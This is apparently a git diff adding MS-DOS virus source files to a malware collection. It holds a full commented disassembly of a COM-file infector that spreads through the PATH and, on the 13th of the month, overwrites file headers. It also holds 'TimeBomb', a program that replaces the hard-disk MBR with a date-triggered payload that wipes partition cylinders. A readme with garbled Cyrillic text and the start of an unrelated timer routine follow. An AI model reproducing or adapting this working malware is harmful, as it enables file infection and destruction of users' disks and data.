< +; > ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? < +; diff --git a/MSDOS/Virus.MSDOS.Unknown.time.asm b/MSDOS/Virus.MSDOS.Unknown.time.asm new file mode 100644 index 00000000..f00138a1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.time.asm @@ -0,0 +1,785 @@ +; Start disassembly +DATA_1E EQU 64H ; (761D:0064=0) +DATA_2E EQU 66H ; (761D:0066=0) +DATA_3E EQU 68H ; (761D:0068=0) +DATA_10E EQU 4F43H ; (761D:4F43=0) +DATA_11E EQU 504DH ; (761D:504D=0) + +SEG_A SEGMENT + ASSUME CS:SEG_A, DS:SEG_A + + + ORG 100h + +Time PROC FAR + +start: + JMP Virus_Entry_Point ; + +; +; +; Original Program without 1st three bytes... +; +; + +DATA_5 DB 9987 DUP (90H) + MOV AH,4CH ; + MOV AL,DATA_2 ; Terminate to DOS with + INT 21H ; exitcode AL + DB 0 +DATA_2 DB 0 + DB 0 + +; +; +; Virus Entry Point +; +; + +Virus_Entry_Point: + JMP SHORT Set_Virus_Data_Point + NOP + +; +; +; Set Virus Data Storage Point +; +; + +Set_Virus_Data_Point: + PUSH CX ; Store CX + MOV DX,2B2DH ; + MOV SI,DX ; SI points at start of + ; virus data + +; +; +; Get DTA Address +; +; + + + PUSH ES ; Store ES + MOV AH,2FH ; GET DTA address into + INT 21H ; ES:BX + MOV [SI],BX ; Store BX of DTA + MOV [SI+2],ES ; Store ES of DTA + POP ES ; Restore ES + +; +; +; Set new DTA Address +; +; + + MOV DX,4EH ; + ADD DX,SI ; + MOV AH,1AH ; + INT 21H ; Set new DTA to DS:DX + + PUSH SI ; Store SI + CLD ; Clear direction + MOV DI,SI ; + ADD SI,0AH ; + ADD DI,81H ; + MOV CX,3 ; Move 3 bytes from source + REP MOVSB ; to destination (E9h, 45h + ; 45h) + POP SI ; Restore SI + + PUSH ES ; Store ES + PUSH SI ; Store SI + PUSH BX ; Store BX + MOV BX,2CH + MOV AX,[BX] ; Get Extra Segment? + POP BX ; Restore BX + MOV ES,AX + MOV DI,0 + +; +; +; Search for the PATH +; +; + +Search_For_Path: + POP SI ; Restore SI + PUSH SI ; Store SI + ADD SI,1AH ; + LODSB ; Load the 'M' into AL + MOV CX,8000H ; + REPNE SCASB ; + MOV CX,4 ; + Path_Loop: + LODSB ; + SCASB ; + JNZ Search_For_Path ; + LOOP Path_Loop ; Pitty, PATH not yet found. + + POP SI ; Restore SI + POP ES ; Restore ES + MOV [SI+16H],DI ; Store address of PATH + MOV BX,SI ; Temp. Storage of SI + ADD SI,26H ; + MOV DI,SI ; + JMP SHORT Find_First_FileName + NOP + +; +; +; +; +; + +Error: + CMP WORD PTR [SI+16H],0 + JNE Set_Virus_Path ; + JMP Restore_Org_DTA ; Error occured. Restore + ; original DTA, + ; 1st three bytes and + ; execute original + ; program. + +; +; +; Start Searching for PATH +; +; + +Set_Virus_Path: + PUSH DS ; Store Registers + PUSH SI + PUSH AX + PUSH ES + PUSH ES + POP DS ; DS=ES + PUSH BX + MOV BX,2CH + MOV AX,[BX] + POP BX ; Restore BX + MOV [SI+1FH],AX ; + MOV DI,SI ; + MOV AX,[DI+16H] ; Org.address of PATH + MOV SI,AX ; + MOV DS,[DI+1FH] ; + POP ES ; + POP AX ; + ADD DI,26H ; +Reached_EO_Path: + LODSB ; Get byte into AL + CMP AL,3BH ; Path Delimiter ';' reached? + JE Delimiter_Reached ; Yes + CMP AL,0 ; End of Path reached? + JE EO_Path_Reached ; Yes + STOSB ; Store byte in AL + JMP SHORT Reached_EO_Path ; +EO_Path_Reached: + MOV SI,0 ; +Delimiter_Reached: + POP BX ; + POP DS ; + MOV [BX+16H],SI ; + CMP BYTE PTR [DI-1],5CH ; Is the PATH closed by + ; a backslash? + JE Find_First_FileName ; Yes + MOV AL,5CH ; + STOSB ; Place Backslash + +; +; +; Find First Filename +; +; + +Find_First_FileName: + MOV [BX+18H],DI ; Store at which address + ; the path starts + ; BX=SI + MOV SI,BX ; Restore SI + ADD SI,10H ; + MOV CX,6 ; + REP MOVSB ; Set Search.Spec. + MOV SI,BX ; Restore SI + + MOV AH,4EH ; + MOV DX,26H ; + ADD DX,SI ; Filename:= *.COM + MOV CX,3 ; Search Attributes: + ; Read Only/Hidden + INT 21H ; Find 1st Filename to + ; match with DS:DX + JMP SHORT Error_Handler ; + NOP + +; +; +; Find Next Filename +; +; + +Find_Next_FileName: + MOV AH,4FH ; + INT 21H ; Find next Filename to + ; match with DS:DX + +; +; +; Error Handler +; +; + +Error_Handler: + JNC Check_Filelength ; Jump if carry=0, so + ; no errors + JMP SHORT Error ; Carry Set, so error + ; occured + +; +; +; Check Filelength and look if file is already infected. +; +; + + +Check_Filelength: + MOV AX,DS:DATA_1E[SI] ; (761D:0064=0) + AND AL,1FH + CMP AL,7 + JE Find_Next_FileName ; File already infected. + CMP WORD PTR DS:DATA_3E[SI],0FA00H + ; Is the length of the + ; file more as FA00h bytes? + JA Find_Next_FileName ; Yes. + CMP WORD PTR DS:DATA_3E[SI],0F00H + ; Is the length of the + ; file less as 0F00h bytes? + JB Find_Next_FileName ; Yes + MOV DI,[SI+18H] ; Get address of path of virus + PUSH SI ; Store SI + ADD SI,6CH +Set_FileName: + LODSB ; Set up Filename for + STOSB ; infection. + CMP AL,0 ; End Of Filename Reached? + JNE Set_FileName ; No + +; +; +; Set Temporary File attributes +; +; + + POP SI ; Restore SI + MOV CX,[SI+63H] ; + MOV CH,0 ; + MOV [SI+8],CX ; Get File-Attributes + MOV AX,CX ; + MOV CX,0FFFEH ; + AND AX,CX ; Remove Read-Only Attribute + MOV CX,AX ; + MOV AX,4301H ; + MOV DX,26H ; + ADD DX,SI ; + INT 21H ; Set File-Attributes + +; +; +; Open the File +; +; + + MOV AX,3D02H ; Open the file for both + INT 21H ; reading and writing + JNC Give_Infection_Marker ; If no error occured... + JMP Set_FileAttributes_Back ; Error occured + +Give_Infection_Marker: + MOV BX,AX + MOV CX,DS:DATA_2E[SI] ; (761D:0066=0) + MOV [SI+6],CX + MOV CX,DS:DATA_1E[SI] ; (761D:0064=0) + AND CL,0E0H + OR CL,7 + MOV [SI+4],CX + JMP SHORT Get_Current_Time ; (2967) + NOP + +; +; +; This Part will be installed resident after hooking INT 20h +; +; + + PUSHF ; Push flags + PUSH DS + PUSH ES + PUSH SS + PUSH AX + PUSH BX + PUSH DX + PUSH DI + PUSH SI + PUSH BP + MOV DX,43H + MOV AL,74H ; This will change the refesh + OUT DX,AL ; rate, thus slowing down the + MOV DX,41H ; PC. Every normal program- + MOV AL,8 ; termination by calling + OUT DX,AL ; INT 20h will call this + MOV AL,7 ; rourtine + OUT DX,AL ; + POP BP + POP SI + POP DI + POP DX + POP BX + POP AX + POP SS + POP ES + POP DS + POPF ; Pop flags + JMP CS:DATA_5 ; (761D:0253=9090H) + ; JMP to org. INT 20h address + ADD [BX+SI],AL + ADD [BX+SI],AL + +; +; +; Get Current Time +; +; + +Get_Current_Time: + PUSH AX ; Store all registers + PUSH BX + PUSH CX + PUSH DX + PUSH DS + PUSH ES + PUSH SI + PUSH DI + PUSH BP + MOV AH,2CH ; Get current time into CX:DX + INT 21H ; CX=hrs/min, DX=sec/hund.sec + CMP DL,32H ; Are we above 32/100 seconds? + JA Get_INT_F2_Vector ; Yes + JMP Start_Trigger_Check ; No + +; +; +; Get Interrupt Vector of INT F2h +; +; + +Get_INT_F2_Vector: + MOV AH,35H ; Get the interrupt vector of + MOV AL,0F2H ; INT 0F2h into ES:BX + INT 21H ; + + CMP BX,7777H ; Was INT F2 already hooked? + + JNE Allocate_Memory ; No + JMP INT_F2_Already_Hooked ; +Allocate_Memory: + MOV AX,DS ; + DEC AX ; + MOV ES,AX ; + MOV BX,0 ; + CMP BYTE PTR ES:[BX],5AH ; + JE Memory_Already_Allocated + PUSH BX ; + MOV AH,48H ; Allocate 4096 16-byte-para- + MOV BX,0FFFFH ; graphs in memory. ??? + INT 21H ; + CMP BX,5 ; Is the largest available + ; 5 or higher? + JAE Again_Allocate_Memory ; Yes + JMP Start_Trigger_Check ; No +Again_Allocate_Memory: + MOV AH,48H ; Again allocate memory + INT 21H ; + POP BX ; + JNC Segment_Decrease ; If there was no error when + ; allocating memory the last + ; time + JMP Start_Trigger_Check ; If there was an error +Segment_Decrease: + DEC AX ; Decrease Segment of Allcated + ; memory + MOV ES,AX ; + MOV BX,1 ; + MOV WORD PTR ES:[BX],0 ; + MOV BX,0 ; + CMP BYTE PTR ES:[BX],5AH ; + JE Memory_Allocated ; + JMP SHORT Start_Trigger_Check + NOP ; +Memory_Allocated: + MOV BX,3 ; + ADD AX,ES:[BX] ; + INC AX ; + MOV BX,12H ; + MOV ES:[BX],AX ; +Memory_Already_Allocated: + MOV BX,3 ; + MOV AX,ES:[BX] ; + SUB AX,5 ; + JC Start_Trigger_Check ; Jump if carry Set + MOV ES:[BX],AX ; + MOV BX,12H ; + SUB WORD PTR ES:[BX],5 ; + MOV ES,ES:[BX] ; + PUSH SI ; Store SI + SUB SI,1F2H ; SI points to the part + MOV DI,0 ; which must become + MOV CX,46H ; resident. + REP MOVSB ; Move the 46h bytes from + ; [SI] to ES:[DI] + POP SI ; Restore SI + MOV BP,ES ; + PUSH CS ; + POP ES ; Restore ES + + MOV AH,25H ; Hook interrupt F2h + MOV AL,0F2H ; New INT-vector will + MOV DX,7777H ; be DS:7777h + INT 21H ; + JMP SHORT Hook_INT_20h ; (2A10) + NOP + +INT_F2_Already_Hooked: + JMP SHORT Start_Trigger_Check + NOP +Hook_INT_20h: + MOV AL,20H ; + MOV AH,35H ; Get the INT 20h Vector + INT 21H ; into ES:BX + + MOV DX,ES ; + MOV ES,BP ; + PUSH SI ; + MOV AX,SI ; + SUB AX,1CAH ; + MOV DI,SI ; + SUB DI,1F2H ; + SUB AX,DI ; + MOV SI,AX ; + MOV ES:[SI],BX ; + ADD SI,2 ; + MOV ES:[SI],DX ; + SUB SI,4 ; + MOV ES:[SI],AX ; + POP SI ; + PUSH CS ; + POP ES ; + + MOV AH,25H ; Install new INT 20h + MOV DS,BP ; vector to DS:DX + MOV DX,0 ; (=DS:00) + MOV AL,20H ; + INT 21H ; + +; +; +; Start Trigger Check +; +; + +Start_Trigger_Check: + POP BP ; Restore Registers + POP DI + POP SI + POP ES + POP DS + POP DX + POP CX + POP BX + POP AX + MOV AH,2AH ; Get the current date + INT 21H ; CX=year, DX=mon/day + CMP DL,0DH ; Is it the 13th of the month? + JNE Start_Infecting_File ; No + +; +; +; It is the 13th of the Month... Select 1 out of 3 destructions +; +; + + MOV AH,2CH ; Get current time + INT 21H ; CX=hrs/min, DX=sec/hund.sec + CMP DL,3CH ; Are we above 60/100 seconds? + JA Destruction_2 ; Yes + CMP DL,1EH ; Are we above 30/100 seconds? + JA Destruction_3 ; Yes + +; +; +; Destruction Scheme 1: Place the following code at the begining of a +; file: MOV AH,00 +; INT 20h +; NOP +; +; When a file is executed with this code at the begining, the program +; will terminate at once with returning to DOS. +; +; + + MOV DX,SI + ADD DX,21H + JMP SHORT Write_5_Destruction_Bytes + NOP + +; +; +; Destruction Scheme 2: Place the following code at the begining of a +; file: HLT +; HLT +; HLT +; HLT +; DB CDh (which is the opcode for INT) +; +; When a file is executed with this code at the begining, the program +; will execute the 4 HLT's and then perform an INT-Call depending on +; the byte following CDh. This can be any INT-Call. So this scheme +; can be consisered the dangeroust of all three destruction schemes. +; will terminate at once with returning to DOS. The first five bytes +; of a file will be overwritten always, making the file useless, but +; issuing and 'random' INT-Call can do much more harm. +; +; + +Destruction_2: + MOV DX,SI + ADD DX,79H + JMP SHORT Write_5_Destruction_Bytes + NOP + +; +; +; Destruction Scheme 3: Place the following code at the begining of a +; file: INT 19h +; INT 19h +; DB ? (Can be anything. It is the 1st byte of the org.file) +; +; When a file is executed with this code at the begining, the program +; will cause a reboot without a memory test and preserving the +; interrupt vectors. If any interrupt vector from 00h through 1Ch has +; been set, the system most likely will hang itself, because of this +; preserving. +; +; + +Destruction_3: + MOV DX,SI + ADD DX,7DH + JMP SHORT Write_5_Destruction_Bytes + NOP + +; +; +; Write the 5 bytes with the destruction to the begining of the file +; +; + +Write_5_Destruction_Bytes: + MOV AH,40H ; + MOV CX,5 ; + INT 21H ; Write 5 bytes to the file + JMP SHORT Set_FileDate_Time_Back + NOP + +; +; +; It is not the 13th of the month... Infect the file +; +; + +Start_Infecting_File: + MOV AH,3FH ; + MOV CX,3 ; Number of bytes to read + MOV DX,0AH ; + ADD DX,SI ; + INT 21H ; Read the bytes from the file + ; and put them at DS:DX + JC Set_FileDate_Time_Back ; If Error Occurred + CMP AL,3 ; 3 Bytes read? + JNE Set_FileDate_Time_Back ; No + + + MOV AX,4202H ; Set the Read/Write + MOV CX,0 ; pointer to the EOF at + MOV DX,0 ; offset CX:DX (=00:00) + INT 21H ; + + MOV CX,AX ; CX=Length of File + SUB AX,3 ; + MOV [SI+0EH],AX ; Store Length -3 bytes + ADD CX,41DH ; CX=CX+41Dh + MOV DI,SI + SUB DI,318H + MOV [DI],CX ; Set new Virus Data Area + ; Address into code + MOV AH,40H ; + MOV CX,3ABH ; CX=3ABh The length of the + ; viral-code written to disk. + MOV DX,SI + SUB DX,31DH ; DX points at the start of + ; the virus code + INT 21H ; Write the viral-code to the + ; file + + JC Set_FileDate_Time_Back ; If an error occured + CMP AX,3ABH ; 3ABh bytes written? + JNE Set_FileDate_Time_Back ; No + MOV AX,4200H ; Move Read/Write Pointer to + MOV CX,0 ; the beginning of the file + MOV DX,0 ; at offset CX:DX(=00:00) + INT 21H ; + + MOV AH,40H ; Write the 1st three new + MOV CX,3 ; bytes to the file. These + MOV DX,SI ; bytes contain the JMP + ADD DX,0DH ; instruction to the virus. + INT 21H ; + +; +; +; Set File-Time/Date back +; +; + +Set_FileDate_Time_Back: + MOV DX,[SI+6] ; Get File-Date + MOV CX,[SI+4] ; Get File-Time + MOV AX,5701H ; Set back the File-Time and + INT 21H ; Date stamps + +; +; +; Close the File +; +; + + MOV AH,3EH ; + INT 21H ; Close the File + +; +; +; Set File Attribute back +; +; + + +Set_FileAttributes_Back: + MOV AX,4301H ; + MOV CX,[SI+8] ; Get File Attribute + MOV DX,26H ; + ADD DX,SI ; + INT 21H ; Set File Attribute + +; +; +; Restore Org DTA address +; +; + +Restore_Org_DTA: + PUSH DS + MOV AH,1AH + MOV DX,[SI] ; Get Original DTA + MOV DS,[SI+2] ; address + INT 21H ; St DTA to ds:dx + +; +; +; Put 3 Original 1st three bytes in place and execute original program +; +; + + POP DS ; Restore DS + PUSH SI ; Store SI + CLD ; + ADD SI,81H ; Address where the 1st three + ; bytes can be found. + MOV DI,100H ; Destination Address + MOV CX,3 ; Number of bytes to move + REP MOVSB ; Move the bytes + POP SI ; Restore SI + POP CX ; Restore CX + XOR AX,AX ; Zero register + XOR BX,BX ; Zero register + XOR DX,DX ; Zero register + XOR SI,SI ; Zero register + MOV DI,100H + PUSH DI ; Store DI + XOR DI,DI ; Zero register + RET 0FFFFH ; Terminate Virus-Code and + ; execute original program. + +; +; +; Virus Data Area +; +; + + +ORG_DTA_ADD: DW ? ; Storing place for BX of + ; original DTA + DW ? ; Storing place for ES of + ; original DTA +File_Time: DW ? ; Storing place for the + ; filetime of the file +Date: DW ? ; Storing place for the + ; filedate +Attrib: DW ? ; Storing place for the + ; file attributes. + +Three_Bytes: DB 0E9h, 27h, 03h + +First_New_Byte: DB 0E9h ; First new byte of the + ; the infected file. This is + ; the jump instruction. +Length_Min_3: DB 0Dh, 27h ; Also new address to jump + ; to for the virus on exe- + ; cution, 2nd and 3rd new byte + +Search_Spec: DB '*.COM',00h + +Path_Add_Org: DW 00,05 + +Path_Add_Vir: DW '6M' + + DB 'PATH=', 00, 00 + +Destruc_Code_1: DB 0B4h, 0h, 0CDh, 20h, 90h + +File_Path: DB 'VIRCOM.COM' ; Filename including PATH + DB 30 DUP(0) + +New_DTA: + DB 02 + DB '????????COM' + DB 03, 11H + DB 7 DUP (0) + DB 20H, 80H, 12H, 17H, 15H, 10H + DB 27H, 0, 0 + +FileName: DB 'VIRCOM.COM', 00h, 00h, 00h + +Destruc_Code_2: DB 0F4H, 0F4H, 0F4H, 0F4H + +Destruc_Code_3: DB 0CDH, 19H, 0CDH, 19H, 0E9H + +First_3_Bytes: DB 0E9h, 45h, 45h + +Notice: DB '(C) Monxla' + +Time ENDP + +SEG_A ENDS + + + + END START + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.timebomb.asm b/MSDOS/Virus.MSDOS.Unknown.timebomb.asm new file mode 100644 index 00000000..4563d0f2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.timebomb.asm @@ -0,0 +1,472 @@ +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +; (C) ANS (Armourer) TimeBomb Ver 1.00 25 Jun +; FIDOnet 2:461/29.444 FreeWare, SourceWare 1995 +; +; +; MBR. ⨦ । ⠫쭮 堥 +; +; MBR 뢠 䠩 c:\mbr.bak, ⮡ 뫮 ⠭, +; ᫨ . ࠢ MBR 砥, ⠪ ᫨ - +; 㬭, 㧪 ⥬ ⨢ ࠧ - TimeBomb ਤ +; ।. +; +; ࠡ뢠 TimeBomb 4 樫 ࠧ +; , ᪨ ᪨ DOS (extended partition) +; +; , Non-DOS ࠧ (HPFS, ਬ) ⮬ ࠤ +; ⥫쭮 - 裡 ७ ⫨稥 DOS FAT. +; +killed_cyl = 4 ; ᫮ 㡨 樫஢ ࠧ +xor_value = 73h ; 祭 ஢ 襣 ᫥ ᫮ ;-) + + locals +cseg segment + assume cs:cseg + org 100h + .286 +start proc near +; +; ⠫ +; + ; ஢塞 ப + mov si, 80h + mov bl, byte ptr [si] + xor bh, bh + cmp bl, 8 + jnc @@checkdate + + +help: + ; ப 㪠 - 뢮 ᪠ + mov dx, offset @@title + mov ah, 9 + int 21h + int 20h + + + ; 祭 BCD-᫠ . ப +getBCD proc near + dec si + mov ax, word ptr [si+bx] ; ६ ᫥ + sub ax, '00' ; ASCII -> BIN + xchg al, ah + db 0d5h, 10h ; AAD 䨪஬ 16 + cmp al, 9ah + jnc help + dec si ; ࠧ 室 ᫥饬 + dec si + retn +getBCD endp + + +@@checkdate: ; ஢塞 (᭠砫 , ⥬ , ⥬ ᫮) + ; ਢ 㦭 ଠ + ; ४⭮ ஢塞 - ஡ 짮⥫ - + ; ⠬ + call getBCD ; ६ + mov byte ptr year, al ; 稫 BCD-year + cmp byte ptr [bx+si+1], '.' ; ஢塞 ࠧ⥫ + jne help + call getBCD ; ६ + mov byte ptr month, al ; 稫 BCD-month + cmp byte ptr [bx+si+1], '.' ; ஢塞 ࠧ⥫ + jne help + call getBCD ; ६ + mov byte ptr day, al ; 稫 BCD-day + + +@@singledisk: +; +; 塞 MBR ᢮ bomb proc +; +; ⠥ MBR, ࠭塞 c:\mbr.bak, 襬 ᥡ +; + ; ⠥ MBR + mov cx, 1 + mov dx, 80h + mov ax, 201h + mov bx, offset buffer + int 13h + jnc @@rd_ok + + mov dx, offset @@rd_err + +@@err_exit: ; 뢮 ᮮ饭 DX 뫥 訡 + mov ah, 9 + int 21h + retn + +@@rd_ok: + ; 䠩 + mov dx, offset @@fname + xor cx, cx + mov ah, 3ch + int 21h + jnc @@cr_ok + + mov dx, offset @@cr_err + jmp @@err_exit + +@@cr_ok: + ; 襬 䠩 + mov bx, ax + mov cx, 512 + mov dx, offset buffer + mov ah, 40h + int 21h + jnc @@wr_ok + + mov dx, offset @@wr_err + jmp @@err_exit + +@@wr_ok: + ; 뢠 䠩 + mov ah, 3eh + int 21h + +; +; ७ᨬ ᢮ MBR ண +; + mov si, offset bomb + mov di, offset buffer + mov bx, di + mov cx, di + sub cx, si + cld + rep movsb + +; +; 뢠 MBR ண +; + mov cx, 1 + mov dx, 80h + mov ax, 301h + int 13h + + mov dx, offset @@mbr_wr_err + jc @@err_exit + + mov dx, offset @@done_msg + jmp @@err_exit + + + ; 饭 訡 +@@rd_err: db 'Error read the MBR of C:',13,10,'$' +@@cr_err: db 'Error creating the ' +@@fname: db 'C:\MBR.BAK',0,'file',13,10,'$' +@@wr_err: db 'Error writing backup file',13,10,'$' +@@mbr_wr_err: db 'Error writing new MBR',13,10,'$' +@@done_msg: db 'Your MBR replaced by TimeBomb',13,10,'$' + + + ; ⠢ +@@title: +db 13,10,10 +db '(C) Armourer TimeBomb Ver 1.00 25 Jun 1995',13,10,10 +db ' Usage: timebomb ',13,10,10 +db ' Where is a fatal date for your computer.',13,10 +db ' Date format must be in exUSSR standard: DD.MM.YY',13,10,10 +db 'Good Luck ;)',13,10,'$' + +start endp + + + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +; . MBR ( MBR ) +; +; 㤥 ⮢ 0:7c00h +; +bomb proc near + + ; ࠨ ⥪ ७ᨬ MBR, 㤠 (0:600h) + cli + mov ax, cs + mov ss, ax + mov ds, ax + mov es, ax + mov si, 7c00h + mov sp, si + push si ; 㦭 ᫥饣 boot' + cld + mov cx, 1beh / 2 ; ᫥ ⠪ ७ SI 㤥 㪠뢠 + mov di, 600h ; + rep movsw + + push ax ; + push offset beginbomb - offset bomb + 600h ; 饭 + retf + + +beginbomb: + ; ஢塞 ६ + mov ah, 4 + int 1ah ; 竨 CX:DX + jc @@skipbomb ; ᫨ ࠡ -> ய᪠ ஢ + +year = $ + 2 + cmp cl, 12h ; ஢塞 + jc @@skipbomb ; ᮢ ;) + jne @@explode ; ᫨ 襫 - 뢠 + +month = $ + 3 +day = $ + 2 + cmp dx, 1234h ; ⠪, ⮡ ᣥ஢ + ; ⪨ ਠ CMP + jc @@skipbomb ; ᮢ + + +@@explode: + ; + ; ᮢ, 諠 ୠ ... + ; + ; ࠥ 樫 ࠧ ( ᪨ + ; ᪨ DOS) + ; + ; ⠭ ࠬ + mov dl, 80h + call destroy + + ; ⠭ ࠬ ண , ᫨ + ror dl, 1 ; ᫨ , 䫠 CF 㤥 ⠭ + jc @@singledisk + + mov dl, 81h + call destroy + +@@singledisk: + jmp @@incorrect ; 뢮 ᮮ饭 "Missing operating ssytem" + + +@@skipbomb: +; +; ࠡ⪠ ଠ쭮 MBR +; + ; 饬 㧮 ࠧ + mov cl, 4 ; ᥣ 4 ਠ ... + +@@searchboot: ; ᪠ + mov dx, word ptr [si] ; ࠧ 㦠 DX , 㦭 + cmp dl, 80h ; ࠧ 㧮 ? + je @@boot + + add si, 10h ; 室 ᫥饩 + loop @@searchboot + + ; 諨 - 뤠 ᮮ饭 +@@incorrect: + call errmsg + db 'Missing operating system',0 + + +@@boot: ; 㦠 boot-ᥪ । ࠢ + mov cx, word ptr [si+2] ; - CX + mov ax, 201h ; ⠥ 1 ᥪ + pop bx ; 0:7c00h + push bx + int 13h + jnc @@exit + + call errmsg + db 'Error reading operating system',0 + +@@exit: + cmp word ptr [bx + 510], 0aa55h + jne @@incorrect + retn ; ᪠ boot + +; +; ணࠬ +; + + ; 뤠 ᮮ饭 訡 +errmsg proc near + sti + cld + pop si + mov ah, 0eh +@@nextchar: + lodsb + or al, al + je $ + int 10h + jmp @@nextchar +errmsg endp + + + ; 室 ࠧ ᪠ ࠬ஢ +getpart proc near + ; ४ᨢ 㭪. + ; 室 SI ॡ 㪠⥫ । ࠧ + ; ES:DI ࠬ ⥪.ࠧ + + mov cx, 4 ; 稪 ࠧ MBR + +@@nextpart: + ; ஢塞 ⨯ ࠧ + cmp byte ptr [si+4], 0 ; ᯮ㥬 ࠧ + je @@exit + + ; 襬 ࠬ ࠧ + mov ax, word ptr [si] ; + stosw + mov dx, ax ; ⮢ 室 ४ + +disk1 = $ + 1 + mov dl, 80h ; ࠡ뢠 ᪠ + + mov ax, word ptr [si+2] + stosw ; /ᥪ + + ; ஢塞 ⨯ ࠧ - ७ ? + cmp byte ptr [si+4], 5 + jne @@exit ; - + + ; 塞 ४ + ; ⠥ MBR ७ ࠧ + push cx ; ࠭塞 稪 + push si ; ࠭塞 㪠⥫ ࠧ + add bx, 512 ; த 㪠⥫ + mov cx, ax ; CX:DX 㪠뢠 MBR + mov ax, 201h ; ७ ࠧ + int 13h ; ⠥ ७ ࠧ 0:BX + jnc @@rec ; ஢ઠ ४⭮ + + ; 室 ४ᨨ 砥 ᡮ + pop si + pop cx + sub bx, 512 + jmp @@exit + +@@rec: + mov si, bx ; ⠭ 㪠⥫ + add si, 1beh ; ⠡ ࠧ + call getpart + + +@@exit: + add si, 10h + loop @@nextpart + + ; 室 ४ᨨ + sub bx, 512 + pop dx + pop si + pop cx + push dx + retn + +getpart endp + + + ; ⮦ ᮤন ⥪饣 ᪠ +destroy proc near + + ; 砥 ࠬ , 㪠 DL + mov byte ptr ds:[offset disk - offset bomb + 600h], dl + mov byte ptr ds:[offset disk1 - offset bomb + 600h], dl + mov ah, 8 + int 13h + mov byte ptr ds:[heads - offset bomb + 600h], dh + and cl, 63 + mov byte ptr ds:[sectors - offset bomb + 600h], cl + push dx + + mov bx, 0a00h ; ⥭ MBR ७ ࠧ + ; 室 BX 㤥 ਡ 512 - + ; ⠪ ᨬ ஢ + ; ⠢ 57 ࠧ + mov di, 500h ; ࠬ int 13h (64 ᪠) + + ; ᨢ 室 ᪨ ᪨, 뢠 ࠬ + ; int 13h + push si ; ४ 室 ४ + push cx + + xor ax, ax ; ⠭ ࠭ MBR + stosw + inc ax + stosw + + call getpart ; 室 ࠧ + + + ; 祭 ய뢠 + ; bx ய뢠 ࠣ - 800h + push di ; ࠭塞 㪠⥫ 墮 ᯨ᪠ ࠬ஢ + mov di, bx ; DI 㤥 㪠⥫ + shl di, 4 ; 㤥 ᯮ ᬥ饭 8000h + push di ; ࠭塞 + +@@nextword: + mov si, offset lmd - offset bomb + 600h + mov cx, 16 +@@nextchar: + lodsb + xor al, xor_value + stosb + loop @@nextchar + dec bx + jne @@nextword + + + ; + pop bx ; ⠭ + pop si ; ⠭ 㪠⥫ ࠬ + mov cx, si ; 塞 ᫮ ࠥ ࠧ + sub cx, 500h + shr cx, 2 + + std + lodsw ; 室 ᫥ + + +@@nextpart: + push cx ; ࠭塞 稪 + + lodsw ; ६ ࠬ ࠧ + mov cx, ax ; /ᥪ + lodsw + mov dx, ax ; + +disk = $ + 1 + mov dl, 80h ; ࠥ ᪠ + + mov si, killed_cyl ; 稪 㡨 樫஢ + + ; ய뢠 ࠧ +@@nexthead: +sectors = $ + 1 + mov ax, 310h ; !!!! + int 13h + inc dh ; + +heads = $ + 2 + cmp dh, 16 ; 樫 ? + jne @@nexthead + + add cx, 64 ; 騩 樫 + xor dh, dh ; 稭 㫥 + dec si + jne @@nexthead + + pop cx ; ⠭ 稪 + loop @@nextpart ; ⨬ 横 ࠧ + + pop dx + retn +destroy endp + + +lmd: + irpc ch, + db '&ch' xor xor_value + endm + +bomb endp + + +buffer: ;  㤥 mbr + dw offset buffer - offset bomb +cseg ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.timebomb.doc b/MSDOS/Virus.MSDOS.Unknown.timebomb.doc new file mode 100644 index 00000000..489cbe35 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.timebomb.doc @@ -0,0 +1,19 @@ + ͻ + ͻ ͹ Just another stuff from + ¿ ¿ ͹ + ͹ < Private Armoury > + ͹ + ͹ ͹ FIDOnet 2:461/29.444 + ͵ BOMB ͹ ͼ + ͼ + + >-> ⠫ MBR ਣ쭮 稪 + >-> ⨦ 㪠 ⠫樨 + >-> 㭨⮦ DOS-ࠧ 1 2 ⪨ ᪠ + >-> ⢥ ० Non-DOS ࠧ ⠬ + <-< ࠭ ० MBR 䠩 C:\MBR.BAK + <-< ஢ 室 ⥪ (asm286) + + >-> >-> ᭨ ᥡ ⢥⢥ <-< <-< + >-> >-> ० ଠ樨, ந襤訥 १ <-< <-< + >-> >-> ஦ 饭 ணࠬ... ;))) <-< <-< diff --git a/MSDOS/Virus.MSDOS.Unknown.timer.asm b/MSDOS/Virus.MSDOS.Unknown.timer.asm new file mode 100644 index 00000000..558e1ea9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.timer.asm @@ -0,0 +1,141 @@ +PAGE ,132 + title \asm_sour\timer.asm HIGH ACCURACY TIMER + subttl michael e. walraven +.MODEL MEDIUM + +name timer +.cref +.lall + +; +; High resolution timer, returns a 32 bit high resolution +; value which is the amount of elapsed time since the function +; was last called. The counts are 838.2ns each (1.19318 MHz) +; time_int() must be called first to set the timer chip to +; the proper mode. +; Counter 0 is changed in time_int() and the data from this +; counter is used in elaptime() so it must not be changed +; between calls. +; There should not be any interference in system timing +; max of 55 msec error introduced by time_int() into absolute +; system time. + +; MEDIUM memory model/microsoft 5.00 +; FAR PROGRAM, NEAR DATA +; cs: is code segment +; es: and ds: are data segment +; ss: within data segment +; ax: for integer return +; dx:ax: for long return + +.DATA +; these data items located in the DSEG and can be accessed +; as near by C programs + + PUBLIC SYS_HI + PUBLIC SYS_LOW + PUBLIC TIMER_COUNT + +SYS_HI DW ? ;TIMER_HI VALUE FOR PREVIOUS CALL +SYS_LOW DW ? ;TIMER_LOW VALUE FOR PREVIOUS CALL +TIMER_COUNT DW ? ;8253 TIMER COUNT FOR PREVIOUS CALL + + +; NO ARGUMENTS PASSED to either function + +TIMER_MODE EQU 043H +TIMER0 EQU 040H + +BIOS SEGMENT AT 040H + ORG 06CH +TIMER_LOW DW ? +TIMER_HI DW ? +BIOS ENDS + +PAGE +.CODE + + PUBLIC _time_int +_time_int PROC + +; void far time_int(void); +; +; SET THE 